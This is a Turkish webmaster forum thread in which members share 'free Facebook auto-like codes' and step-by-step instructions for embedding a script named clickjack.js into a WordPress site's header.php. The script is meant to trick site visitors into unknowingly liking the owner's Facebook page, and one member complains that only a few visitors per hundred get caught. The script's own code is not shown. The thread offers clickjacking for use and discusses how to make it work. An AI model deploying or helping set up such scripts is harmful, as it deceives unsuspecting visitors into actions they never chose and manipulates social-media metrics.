İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Facebook auto-like kodları (ücretsiz)

baba

0
İyinet Üyesi
Reaction score
0
Bu kodlar herhangi bir siteye bir sisteme (asp,php,html, v.s) uygulanabilir. Sadece yapmanız gereken kodu siteye ekleyeceğiniz yeri bilmektir. Bunun için en uygun yer wordpress ve joomla gibi hazır sitelerde "header.php veya footer.php" dosyalarına kodları eklemektir. Detaylı bilgileri indireceğiniz zip dosyasının içinde bulursunuz.

izzy_44

0
İyinet Üyesi
Reaction score
0
ben bu kodu kullanıyorum fakat şöyle bi problem var. siteye 100 kişi giriyosa sayfayı en fazla 5-6 kişi beğeniyo. bunun nedenini bir türlü çözemedim. çözen arkadaş varsa duacısı olurum

bilemem83

0
İyinet Üyesi
Reaction score
0
Merhaba arkadaşlar.

Bir konu okudum az önce ve sabah sabah sinirlerimi bozdu. Arkadaş auto-like kodlarını bile ücretli veriyor. Boşverin mesaj dahi atmayın daha iyi.

Birkaç arkadaş istemiş merak etmiş bende paylaşayım dedim. Aslında tereddütlerim yok değil. Şimdi her taraf auto-like ile dolacak diye. Ama olsun. :)

Ekteki js dosyasını indirin ve herhangi bir editörle açın. Aşağıdaki kodu bulun.

Kod:
http://www.facebook.com/aska.dair.sirali.cumleler
Kendi facebook sayfa isminizle değiştirin. Ve tema klasörünün içine atın. (hangi scriptte yapacağınızı bilmediğim için wordpress'e göre konuşuyorum) Daha sonra header.php yi açın ve aşağıdaki kodu bulun.

Kod:
<body>
Hemen altına yapıştırın.

Kod:
<script src="<?php bloginfo('template_url'); ?>/clickjack.js"></script>
header.php yide tema klasörünüze atın. Hepsi bu kadar. Farklı scriptleri kullanan arkadaşlarda kendilerine göre ayarlayabilirler. Yapamazlarsa ben yardımcı olurum.

ekteki dosya nerde ??

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5